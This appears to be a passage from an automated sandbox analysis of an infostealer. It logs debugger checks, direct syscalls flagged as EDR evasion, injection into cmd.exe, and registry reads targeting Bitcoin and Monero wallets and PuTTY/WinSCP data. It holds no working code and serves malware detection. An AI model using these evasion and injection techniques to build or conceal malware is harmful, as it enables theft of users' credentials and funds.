Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092E88A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B456BA4 VirtualProtect ?,-00000001,00000104,?3_2_6B456BA4
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009348D8 mov eax, dword ptr fs:[00000030h]0_2_009348D8
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB48D8 mov eax, dword ptr fs:[00000030h]1_2_00CB48D8
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0090394F GetProcessHeap,RtlAllocateHeap,0_2_0090394F
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0092E3D8
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092E88A
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092E9DC SetUnhandledExceptionFilter,0_2_0092E9DC
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00933C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00933C76
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00CAE3D8
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00CAE88A
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAE9DC SetUnhandledExceptionFilter,1_2_00CAE9DC
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00CB3C76
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeCode function: 2_2_6BD309A6 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_6BD309A6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B0C7FC2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6B0C7FC2
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B45AD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,3_2_6B45AD2C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B45C097 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6B45C097
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E07A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6B3E07A7
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4C3727 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6B4C3727

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF73FBC6DE3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBAEEB6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBA4A3DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBBBCC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC3E0D3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF73FBA8340Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBA8C3EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC871E7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF73FC737A6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB03D92Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFE221C26A1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF73FCC5120Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF73FC648B3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF73FD1800D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBAEC53Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC79C73Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF73FBC63B7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF73FC64AC4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF73FC8A57EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF73FC1D833Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF73FBC70E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBF1072Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FD16D98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBA362EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtTerminateProcess: Direct from: 0x7FF73FBA75EDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB0ACA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF73FC27976Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF73FBA8A19Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF73FD15B8E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC11701Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBC3116Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB1399FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB0E868Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x7FF73FB9CDCAJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB16355Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeNtQuerySystemInformation: Direct from: 0x76EF63E1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF73FC6552DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF73FB041BFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF73FD15B77Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB0C4D3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF73FB98E5DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF73FBA8418Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF73FBC7E48Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF73FBF6CF3Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x6B8F7B9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF73FB8F5AAJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF73FCC3324Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBBC79DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF73FC6A520Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationThread: Direct from: 0x7FF73FD209CEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB0A692Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF73FB98AA9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF73FC733DFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF73FB03FB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC6A9B6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF73FC8EC2DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF73FBA352FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF73FC65A4DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF73FBC64A6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtOpenKeyEx: Direct from: 0x7FF73FBC5EECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF73FC64987Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF73FD13A6AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF73FB8F4BEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC68ADDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC70A7DJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF73FC6A355Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF73FC6A5ABJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF73FC9012AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB135D2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF73FB9CB90Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtEnumerateValueKey: Direct from: 0x7FF73FC5465DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB5F709Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC7B955Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC7363DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF73FBF5F50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBF319EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB0A3EAJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF73FD137DBJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FB0E314Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBF3F0CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF73FD17FFF
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF73FC65183Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF73FBA9496Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF73FB9D346Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x6F847B9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF73FC99C9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC6CCA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FBF6D35Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF73FD17FEB
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF73FD1696AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF73FC6E7C5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtEnumerateKey: Direct from: 0x7FF73FD1890FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 253010Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 237010Jump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3EE0F _LogonUser_@24,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,LogonUserA,GlobalFree,GlobalFree,GlobalFree,1_2_5BB3EE0F
Source: C:\Users\user\Desktop\w3245.exeProcess created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe "C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692 Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00941719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_00941719
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00943A5F AllocateAndInitializeSid,CheckTokenMembership,0_2_00943A5F
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000003.00000002.1806872919.000000006B12E000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: kChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000002.00000002.1749574977.000000006C82E000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: n{lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092EC07 cpuid 0_2_0092EC07
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: _GetLocaleInfo_@16,SetLastError,newMultiByteFromWideCharSize,GetLocaleInfoA,MultiByteToWideChar,GlobalFree,1_2_5BB32D1A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,3_2_6B45EF5C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6B45F356
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,3_2_6B3E73B4
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,3_2_6B3E7270
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage,3_2_6B45F22F
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6B45F2EF
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,3_2_6B3E52E4
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage,3_2_6B45F05E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_6B45F003
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,3_2_6B3E767A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,3_2_6B3E750C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,3_2_6B3E74D0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: _Getdateorder,___lc_handle_func,GetLocaleInfoW,3_2_6B4BB33D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00914EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,0_2_00914EDF
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00906037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,0_2_00906037
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009061DF GetUserNameW,GetLastError,0_2_009061DF
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0094887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_0094887B
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00905195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,0_2_00905195
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
